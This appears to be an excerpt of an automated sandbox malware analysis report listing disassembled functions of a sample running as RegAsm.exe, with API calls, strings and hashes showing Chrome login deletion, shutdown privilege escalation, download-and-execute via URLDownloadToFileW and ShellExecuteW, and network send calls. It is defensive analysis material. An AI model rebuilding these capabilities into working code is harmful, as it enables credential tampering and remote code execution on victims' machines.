                                                                                                                                                                                                  • Instruction Fuzzy Hash: BBC27E71D046288FDB25CE28DD407EAB3B5EB8530AF1541EBD80DE7241E778AE898F45
                                                                                                                                                                                                  Function 00414005 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegCreateKeyExW.ADVAPI32(00000000), ref: 004140D8
                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004140E4
                                                                                                                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 004142A5
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                                                                                                                  • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                                                                                                                  • API String ID: 2127411465-314212984
                                                                                                                                                                                                  • Opcode ID: 581ded355985a4bc997a0b6be421fb480f1ccbde3fac771bed5e254f0fcd46b0
                                                                                                                                                                                                  • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 581ded355985a4bc997a0b6be421fb480f1ccbde3fac771bed5e254f0fcd46b0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                                                                                                                                                                                                  Function 004167EF Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                                                                                                                                                    • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                                                                                                                                                    • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                                                                                                                                                    • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                                                                                                                                                    • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                                                                                                                                                                                  • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(PowrProf.dll), ref: 004168A6
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                                                                                                                  • String ID: !D@$PowrProf.dll$SetSuspendState
                                                                                                                                                                                                  • API String ID: 1589313981-2876530381
                                                                                                                                                                                                  • Opcode ID: 8a62792aef7cc7d5af05d35e91714c9c7222b42edbd342514d80bf55c44c9374
                                                                                                                                                                                                  • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8a62792aef7cc7d5af05d35e91714c9c7222b42edbd342514d80bf55c44c9374
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                                                                                                                                                                                  Function 0040BA4D Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040BA93
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                                                                                                                                                                                  • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                                                                                                                                                                                  • UserProfile, xrefs: 0040BA59
                                                                                                                                                                                                  • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DeleteErrorFileLast
                                                                                                                                                                                                  • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                                                                                                                  • API String ID: 2018770650-1062637481
                                                                                                                                                                                                  • Opcode ID: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                                                                                                                                                                                                  • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                                                                                                                                                                                  Function 0041798D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                                                                                                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004179D8
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                  • String ID: SeShutdownPrivilege
                                                                                                                                                                                                  • API String ID: 3534403312-3733053543
                                                                                                                                                                                                  • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                                                                                                                                                  • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                                                                                                                                                                                  Function 0040928E Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00409293
                                                                                                                                                                                                    • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,021C4988,00000010), ref: 004048E0
                                                                                                                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 004093FC
                                                                                                                                                                                                    • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                                                                                                                                                    • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                                                                                                                                                    • Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C
                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 004095F4
                                                                                                                                                                                                    • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                                                                                                                                    • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1824512719-0
                                                                                                                                                                                                  • Opcode ID: c95fe17c2b037c64b82bab9d1ad7effbaf2979e44fe57e53c64eae2a8e6f4ce2
                                                                                                                                                                                                  • Instruction ID: 89df7f8b75d3b77417eb58d09b4f39b7dfb13bde992cfd9524fc7595df83f5be
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c95fe17c2b037c64b82bab9d1ad7effbaf2979e44fe57e53c64eae2a8e6f4ce2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34B19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                                                                                                                                                                                  Function 0041AADB Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                                                                                                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                                                                                                                                                                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 276877138-0
                                                                                                                                                                                                  • Opcode ID: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                                                                                                                                                                  • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                                                                                                                                                                                  Function 004524BC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                                                                                                                                                                                                  • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                                                                                  • API String ID: 2299586839-711371036
                                                                                                                                                                                                  • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                                                                                                                                                  • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                                                                                                                                                                                  Function 0041B539 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000,?,0040F419,00000000), ref: 0041B54A
                                                                                                                                                                                                  • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                                                                                                                                                                                  • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                                                                                                                                                                                  • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                  • String ID: SETTINGS
                                                                                                                                                                                                  • API String ID: 3473537107-594951305
                                                                                                                                                                                                  • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                                                                                                                                                                  • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
                                                                                                                                                                                                  Function 004096A0 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004096A5
                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Find$File$CloseFirstH_prologNext
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1157919129-0
                                                                                                                                                                                                  • Opcode ID: 0a4f7936ce2960db9bf45ce6e7c064902b20e644c01fdc90b969e8a4ba3c73a8
                                                                                                                                                                                                  • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a4f7936ce2960db9bf45ce6e7c064902b20e644c01fdc90b969e8a4ba3c73a8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                                                                                                                                                                                  Function 00408847 Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0040884C
                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                                                                                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1771804793-0
                                                                                                                                                                                                  • Opcode ID: ec9c60c0984909d8cd4645444dd457f9d8bf9c0522e2e7366979e8a6a318d365
                                                                                                                                                                                                  • Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ec9c60c0984909d8cd4645444dd457f9d8bf9c0522e2e7366979e8a6a318d365
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
                                                                                                                                                                                                  Function 00406EEB Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                                                                                                                                                                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DownloadExecuteFileShell
                                                                                                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                                                                                                                                                                                  • API String ID: 2825088817-3056885514
                                                                                                                                                                                                  • Opcode ID: bb7b935ec16baebde2972a127086196db108f891a0ecdc83552d77310a0d38e2
                                                                                                                                                                                                  • Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb7b935ec16baebde2972a127086196db108f891a0ecdc83552d77310a0d38e2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
                                                                                                                                                                                                  Function 00452143 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 205COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                                                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                                                                                                                  • String ID: t'`/
                                                                                                                                                                                                  • API String ID: 2829624132-2084328917
                                                                                                                                                                                                  • Opcode ID: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                                                                                                                                                                  • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                                                                                                                                                                                                  Function 00407877 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                                                                                                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileFind$FirstNextsend
                                                                                                                                                                                                  • String ID: XPG$XPG
                                                                                                                                                                                                  • API String ID: 4113138495-1962359302
                                                                                                                                                                                                  • Opcode ID: 3d84d9c70616012fa8221750c6a8410ee04de753accb1628ad2af8c264aec63b
                                                                                                                                                                                                  • Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d84d9c70616012fa8221750c6a8410ee04de753accb1628ad2af8c264aec63b
